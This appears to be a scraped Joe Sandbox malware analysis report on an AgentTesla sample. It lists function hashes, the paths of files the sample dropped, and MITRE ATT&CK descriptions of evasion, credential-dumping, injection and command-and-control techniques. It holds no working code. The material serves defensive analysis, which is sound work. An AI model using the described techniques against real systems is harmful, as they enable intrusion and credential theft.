Instruction ID: d6b0456053be7e88162c49dc9ab8b3cc2a7d566b07b11b4aa1531b16d891a1b7
Opcode Fuzzy Hash: 985c63b566ce522b0c936dde7ef61e4abdae1118d04e5058a0789b5c6a6d04ff
Instruction Fuzzy Hash: 2B01AD327020209BD72A95ADD45071BB7CBEBC9710F20883AE50ECB382DE69ED4247A1

Function 28056EC0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801a33ed99bf0a8a5ea1f7ea8b05ce32e0a7877484f9e9b97d94dd32245f1b3c
Instruction ID: 4bd6cd179d7575225b071170ac819309e485fe229cbacfde62759b7505d039d1
Opcode Fuzzy Hash: 801a33ed99bf0a8a5ea1f7ea8b05ce32e0a7877484f9e9b97d94dd32245f1b3c
Instruction Fuzzy Hash: 1411C2B1D012599FCB10DF9AD884ACEFBB4FB48710F50812AE918A7340C3786554CFA5

Function 28057448 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ddd9dab5f4a079c932b87519f36940ff3b800b6921dc8bbe5848e5a8cd0ae3
Instruction ID: 3cfe4c7c534d10b576c3c54a8bee011e7fb45c77862d3c2c8b036176744c92a1
Opcode Fuzzy Hash: 62ddd9dab5f4a079c932b87519f36940ff3b800b6921dc8bbe5848e5a8cd0ae3
Instruction Fuzzy Hash: A80181327020218BD72A95BDD45571BB7DBEBC9710F20883AE50ECB386DF69ED4247A1

Function 2805D908 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954f681a77e88b134285d8f013aa8ba1442b7d90ab3061882bfe1a835a53705d
Instruction ID: a6f70082e99ab8e889cb852cdb55b50e175d412aa74e2b55e6b327d57d71a7a3
Opcode Fuzzy Hash: 954f681a77e88b134285d8f013aa8ba1442b7d90ab3061882bfe1a835a53705d
Instruction Fuzzy Hash: 6D016D307021118FD705DA68D56071B73D7EB8EA10F108839E90ECB355DE2AFD028791

Function 28059670 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680ec35603117ba48c53eec5323ebea9dea46d56c88db9e37fa3479407c28cb3
Instruction ID: 9ed68b97118408404b87e5693c8119020d8e158cfaf68b66a0d2be7fecf4aa5a
Opcode Fuzzy Hash: 680ec35603117ba48c53eec5323ebea9dea46d56c88db9e37fa3479407c28cb3
Instruction Fuzzy Hash: A6F065A1D06344EFDB01CBB099456497FAEEB47309F1588EAD449DB113E239CB058760

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report REnBTVfW8q.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Jervin197.ini

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.Hav

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\kloakanlgget.txt

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\overnatningssted.osm

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\rternes.sim

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\sygeplejeres.fil

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktw5ysw.tdm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3uzqhvf.ru3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmn2abq2.tvw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lorbuuq2.dlt.psm1

C:\Users\user\AppData\Local\Temp\nsc2139.tmp

Static File Info

Windows Analysis Report
REnBTVfW8q.exe

Function 00403489 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 412
stringfilecomCOMMON

Function 00405553 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 004066F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403E6C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403ABE Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402F14 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Function 004063D2 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405414 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Function 0040671A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre